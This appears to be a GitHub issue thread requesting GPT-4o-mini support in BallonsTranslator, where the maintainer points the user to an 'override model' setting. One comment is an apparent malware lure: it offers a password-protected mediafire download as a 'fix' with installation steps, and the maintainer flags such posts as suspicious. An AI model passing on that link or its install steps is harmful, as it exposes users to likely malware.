### ISSUE TITLE
[Request] Add ChatGPTs GPT 4o-mini to your GPT module

### ISSUE THREAD

**Issue by notimp** [dmMaze/BallonsTranslator#561]
Please add GPT 4o-mini to your GPT module.

Its a decent quality and yet economical option for the economical minded people out there, that cant simply edit the python code.

Thank you. :)

If some of the older modules now gets automatically forwarded to GPT 4o-mini, please excuse my ignorance, but probably rename them to their current version model descriptions.

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by dmMaze** [comment]
Select ChatGPT,  and write override model name in ```override model```

Comments were deleted for off-topic and posting suspicious links.

**Comment by notimp** [comment]
Thank you-

Any idea what to exactly put in there?
